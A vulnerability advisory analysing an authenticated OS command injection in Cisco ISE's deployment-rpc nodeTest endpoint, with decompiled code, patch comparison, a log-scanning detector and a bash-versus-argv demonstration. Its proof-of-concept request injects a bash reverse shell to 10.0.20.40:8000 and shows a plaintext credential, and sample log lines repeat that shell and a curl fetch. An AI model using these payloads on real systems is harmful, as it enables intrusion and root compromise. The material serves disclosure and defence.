(CVE-2026-20147) Cisco Identity Services Engine Authenticated Command Injection in Deployment-RPC Leading to Remote Code Execution

CVE: CVE-2026-20147

Affected Versions: Cisco ISE / ISE-PIC 3.4 prior to Patch 6 (correspondingly 3.1 prior to Patch 11, 3.2 prior to Patch 10, 3.3 prior to Patch 11, 3.5 prior to Patch 3; releases earlier than 3.1 must migrate to a fixed release)

CVSS3.1: 9.1 (Critical) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Related: This advisory covers only CVE-2026-20147. Cisco’s bulletin cisco-sa-ise-rce-traversal-8bYndVrZ bundles a second, unrelated issue — CVE-2026-20148, an authenticated path traversal / arbitrary file read (Medium, CVSS 4.9) — which is not analysed here.

Summary

Product: Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC)
Vendor: Cisco
Severity: Critical - an authenticated remote attacker can execute arbitrary commands on the underlying operating system and escalate to root
Affected Versions: Cisco ISE / ISE-PIC 3.4 prior to Patch 6 (correspondingly 3.1 prior to Patch 11, 3.2 prior to Patch 10, 3.3 prior to Patch 11, 3.5 prior to Patch 3)
Tested Versions: Cisco ISE 3.4 Patch 5
CVE Identifier: CVE-2026-20147
CVE Description: Insufficient validation of user-supplied input in the deployment-rpc nodeTest method allows an authenticated administrative attacker to inject OS commands via the restartNodes parameter, achieving remote code execution as root
CWE Classification(s): CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') (more specifically CWE-78: OS Command Injection)

CVSS3.1 Scoring System

Base Score: 9.1 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Metric Value
Attack Vector (AV) Network
Attack Complexity (AC) Low
Privileges Required (PR) High
User Interaction (UI) None
Scope (S) Changed
Confidentiality (C) High
Integrity (I) High
Availability (A) High

Note on scoring: Cisco’s published advisory (cisco-sa-ise-rce-traversal-8bYndVrZ) rates CVE-2026-20147 at 9.9 (Critical) with CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. Our assessment differs only on Privileges Required: because exploitation requires valid administrative credentials, we assess PR as High, yielding a base score of 9.1.

Vulnerability Summary

The nodeTest method in deployment-rpc is vulnerable to command injection: it concatenates unsanitized user input into a shell command string that is then handed to bash -c. An authenticated administrative attacker can leverage this to execute arbitrary commands on the underlying operating system and escalate privileges to root. On single-node deployments, exploitation can additionally render the ISE node unavailable, a denial-of-service condition in which endpoints that have not yet authenticated cannot access the network until the node is restored.

Vulnerability Details

At [1], the nodeTest method in apache-tomcat/webapps/deployment-rpc/WEB-INF/classes/com/cisco/cpm/infrastructure/deployment/rpc/NodeRestartListener.class reads restartMode and restartNodes straight from the request and, without any validation, passes them to RestartUtil.invokeScript:

private void nodeTest(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
	PrintWriter var3 = var2.getWriter();
	RestartUtil.getInstance().invokeScript(var1.getParameter("restartMode"), var1.getParameter("restartNodes"));  // [1]
	var3.close();
}

RestartUtil (apache-tomcat/lib/systemconfig-3.4.0-608.jar!/com/cisco/cpm/infrastructure/systemconfig/RestartUtil.class) exposes a two-argument invokeScript that fixes the restart sequence to "0" and forwards both request-supplied values to the three-argument overload at [2]. That overload builds one bash -c command line by plain string concatenation, appending restartMode (var1), the sequence (var2) and restartNodes (var3) verbatim, and executes it at [3], leading to arbitrary command execution:

public void invokeScript(String var1, String var2) throws RestartUtilException {
	// var1 = restartMode, var2 = restartNodes (both taken unmodified from the request)
	String var3 = "0";  // restart sequence, fixed
	// ...
	this.invokeScript(var1, var3, var2);  // [2]
}

public void invokeScript(String var1, String var2, String var3) throws RestartUtilException {
	// var1 = restartMode, var2 = restart sequence ("0"), var3 = restartNodes
	// var9 = path to the java launcher, var13 = java.class.path (see the Patch Analysis below)
	// ...

	ProcessBuilder var10 = new ProcessBuilder(new String[]{
		"bash", "-c",
		var9 + " -Dise.fipsMode=true -cp " + var13 + ":" + "/opt/CSCOcpm/appsrv/apache-tomcat" + "/lib/* "
			+ RestartUtil.class.getCanonicalName()
			+ " " + var1 + " " + var2 + " " + var3   // request-controlled values spliced into the shell string
			+ " >> " + "/opt/CSCOcpm/logs/restartutil.log" + " 2>&1"});
	var10.redirectErrorStream(true);
	GenericUtil.log("RestartUtil: Process builder starting with RestartMode:RestartSequence:RestartNodes=" + var1 + ":" + var2 + ":" + var3);
	var10.start();  // [3]
	// ...
}

The restartNodes value flows unmodified into the bash -c command string, so any shell metacharacters it contains ($(...), backticks, ;, |, &&, redirections) are interpreted by the shell before the java launcher is ever executed. Note also that the GenericUtil.log call immediately before [3] writes the full RestartMode:RestartSequence:RestartNodes triple to the log, so an injected payload is recorded verbatim at the moment it is run.
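As an added detection example (not part of the original advisory or of Cisco's code): because the log message written just before [3] records the full mode:sequence:nodes triple, a scan of that log can surface exploitation attempts after the fact. The script below parses constructed sample lines in that format; the timestamp/level prefix on each line, the location of the log file, and the allowlist of characters a legitimate node list may contain are assumptions of the example, not facts from the page.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Exact message prefix written by RestartUtil.invokeScript() just before ProcessBuilder.start().
MARKER = "RestartUtil: Process builder starting with RestartMode:RestartSequence:RestartNodes="

# Assumption for this example: a legitimate node list is hostnames / IPs, comma separated.
# ISE's own expectations for the value are not documented on the page.
NODE_LIST_OK = re.compile(r"^[A-Za-z0-9.,_-]*$")

# Characters bash would treat specially inside the unpatched `bash -c` string.
SHELL_META = re.compile(r"[$`;|&<>(){}\\\"' ]")


@dataclass
class RestartEvent:
    line_no: int
    restart_mode: str
    restart_sequence: str
    restart_nodes: str
    reason: Optional[str]  # None when the event looks benign

    @property
    def suspicious(self) -> bool:
        return self.reason is not None


def parse_restart_event(line_no: int, line: str) -> Optional[RestartEvent]:
    """Return a RestartEvent for a line carrying MARKER, else None."""
    idx = line.find(MARKER)
    if idx < 0:
        return None
    triple = line[idx + len(MARKER):].rstrip("\r\n")
    # restartMode and restartSequence never contain ':'; everything after the
    # second ':' is the request-supplied restartNodes value, colons included.
    parts = triple.split(":", 2)
    if len(parts) != 3:
        return RestartEvent(line_no, triple, "", "", "malformed mode:sequence:nodes triple")
    mode, seq, nodes = parts
    reason = None
    if not NODE_LIST_OK.match(nodes):
        meta = "".join(sorted(set(SHELL_META.findall(nodes))))
        reason = (f"restartNodes contains shell metacharacters {meta!r}" if meta
                  else "restartNodes contains characters outside the node-name allowlist")
    return RestartEvent(line_no, mode, seq, nodes, reason)


def scan(lines: Iterable[str]) -> List[RestartEvent]:
    """Parse every restart event in a log stream (benign and suspicious alike)."""
    events = []
    for n, line in enumerate(lines, start=1):
        event = parse_restart_event(n, line)
        if event is not None:
            events.append(event)
    return events


def suspicious_events(lines: Iterable[str]) -> List[RestartEvent]:
    return [e for e in scan(lines) if e.suspicious]


# Constructed sample log lines (not real ISE output); only the MARKER text comes from the code above.
SAMPLE_LOG = [
    "2026-05-04 10:12:33 INFO  unrelated noise line",
    "2026-05-04 10:12:40 INFO  " + MARKER + "apponly:0:ise-pan-01",
    "2026-05-04 10:13:02 INFO  " + MARKER
    + "apponly:0:$(bash -i >& /dev/tcp/10.0.20.40/8000 0>&1).x",
    "2026-05-04 10:13:05 INFO  " + MARKER + "apponly:0:ise-psn-01,ise-psn-02",
    "2026-05-04 10:14:11 INFO  " + MARKER + "apponly:0:$(curl http://10.0.20.40:8000/x).x",
]

if __name__ == "__main__":
    for e in scan(SAMPLE_LOG):
        flag = "ALERT" if e.suspicious else "ok   "
        print(f"{flag} line {e.line_no}: mode={e.restart_mode} seq={e.restart_sequence} "
              f"nodes={e.restart_nodes!r}" + (f"  <- {e.reason}" if e.reason else ""))
```

The split with maxsplit=2 matters: a payload can itself contain colons (the fourth sample line has host:port), and a naive split on every colon would truncate the evidence. The allowlist is deliberately strict rather than a blocklist of metacharacters, so encoded or unusual variants still get flagged; tune it to the node names actually in use.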

Proof-of-Concept

This request injects a reverse-shell payload via the restartNodes parameter using $() command substitution, authenticating with the plaintext password obtained from ISE-HIGH-01. The <@...>…</@...> tags mark the encodings applied before the request is sent: the inner command is percent-encoded (spaces as %20 rather than +, and the > and & characters encoded so they survive as query data rather than terminating the parameter), and the Basic credentials are Base64-encoded. Because bash performs command substitution during word expansion, the reverse shell runs before the java launcher is invoked; the substitution's output (empty, since the inner shell's stdout is redirected to the socket) plus the trailing .x is what eventually becomes the restartNodes argument. A listener must be waiting on 10.0.20.40:8000 before the request is sent:

GET /deployment-rpc/nodeTest/?restartMode=apponly&restartNodes=$(<@urlencode_not_plus>bash -i >& /dev/tcp/10.0.20.40/8000 0>&1</@urlencode_not_plus>).x HTTP/1.0
Authorization: Basic <@base64>~internal-alertmanager-ise-api:4KlG3(,s</@base64>
Accept: */*
Connection: close

Patch Analysis

In P5, RestartUtil.invokeScript() passes user input (str3, the restartNodes parameter) through bash -c as part of a concatenated command string, allowing shell metacharacter interpretation:

ProcessBuilder processBuilder = new ProcessBuilder(
    "bash", "-c",
    (System.getProperty("java.home") + property + "bin" + property + "java") +
    " -Dise.fipsMode=true -cp " + System.getProperty("java.class.path") + ":" +
    APACHE_HOME + "/lib/* " + RestartUtil.class.getCanonicalName() + " " +
    str + " " + str2 + " " + str3 + " >> " + RestartLog + " 2>&1");

In P6 the bash -c indirection is gone: the launcher path and each option and argument are passed as separate elements of the ProcessBuilder argument list, so they reach the child process as distinct argv entries without any shell parsing them:

ProcessBuilder processBuilder = new ProcessBuilder(
    System.getProperty("java.home") + property + "bin" + property + "java",
    "-Dise.fipsMode=true",
    "-cp",
    System.getProperty("java.class.path") + ":" + APACHE_HOME + "/lib/*",
    RestartUtil.class.getCanonicalName(),
    str, str2, str3);

Shell metacharacters such as $() and ; in str3 are no longer evaluated; they arrive in the child's argv as literal characters. The lib/* wildcard in the -cp entry keeps working because the Java launcher expands class-path wildcards itself, independently of any shell. No bypass identified.
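To make the difference between the two shapes concrete, here is an added Python demonstration (not the advisory's or Cisco's code) that mirrors both ProcessBuilder calls with subprocess: the P5 shape hands one concatenated string to bash -c (falling back to sh if bash is absent), the P6 shape passes an argument list. echo stands in for the java launcher so the argv the child actually receives is visible; the class path and class name are placeholders, and the log redirection is dropped so output can be captured.

```python
import shutil
import subprocess

JAVA = "echo"                          # stand-in for $JAVA_HOME/bin/java: prints the argv it receives
CLASSPATH = "app.jar:lib/*"            # placeholder for java.class.path + APACHE_HOME/lib/*
MAIN_CLASS = "com.cisco.cpm.infrastructure.systemconfig.RestartUtil"
SHELL_BIN = shutil.which("bash") or "sh"  # the unpatched code hard-codes bash


def spawn_p5(restart_mode: str, restart_seq: str, restart_nodes: str) -> str:
    """P5 shape: one concatenated command line, interpreted by a shell before anything runs."""
    cmd = (f"{JAVA} -Dise.fipsMode=true -cp {CLASSPATH} {MAIN_CLASS} "
           f"{restart_mode} {restart_seq} {restart_nodes}")
    out = subprocess.run([SHELL_BIN, "-c", cmd], capture_output=True, text=True, check=True).stdout
    return out.strip()


def spawn_p6(restart_mode: str, restart_seq: str, restart_nodes: str) -> str:
    """P6 shape: argv list, no shell; each value is exactly one argument however it is spelled."""
    argv = [JAVA, "-Dise.fipsMode=true", "-cp", CLASSPATH, MAIN_CLASS,
            restart_mode, restart_seq, restart_nodes]
    out = subprocess.run(argv, capture_output=True, text=True, check=True).stdout
    return out.strip()


def args_after_class(output: str) -> str:
    """Drop the fixed launcher options so only mode/seq/nodes (and any injected command's output) remain."""
    return output.split(MAIN_CLASS + " ", 1)[1]


PAYLOADS = {
    "substitution": "$(echo INJECTED).x",   # the PoC's primitive, with a harmless inner command
    "separator":    "x; echo PWNED",         # a second command appended with ';'
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"[{name}] P5 (bash -c): {args_after_class(spawn_p5('apponly', '0', payload))!r}")
        print(f"[{name}] P6 (argv):    {args_after_class(spawn_p6('apponly', '0', payload))!r}")
```

With the P5 shape the substitution has already run and the `;` payload produces a second line of output from a second process; with the P6 shape both payloads are delivered to the launcher byte-for-byte, which is why the fix needs no escaping or allowlisting of restartNodes to stop shell injection.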

Credit

This vulnerability was discovered by Li Jiantao and Tevel Sho (intern) of STAR Labs SG Pte. Ltd.

We reported this issue to Cisco after it had already been received from another reporter, and as such we were not officially credited in Cisco’s advisory. Cisco’s published advisory (cisco-sa-ise-rce-traversal-8bYndVrZ) credits Jonathan Lein of TrendAI Research. We are publishing this advisory to document our independent discovery and analysis.

Timeline

  • 2026-04-15 - Cisco publishes advisory cisco-sa-ise-rce-traversal-8bYndVrZ (Version 1.0)
  • 2026-04-28 - Cisco updates advisory to Version 1.1 (fixed release availability)
  • 2026-05-04 - STAR Labs reports the vulnerability to Cisco PSIRT
  • 2026-06-08 - STAR Labs public disclosure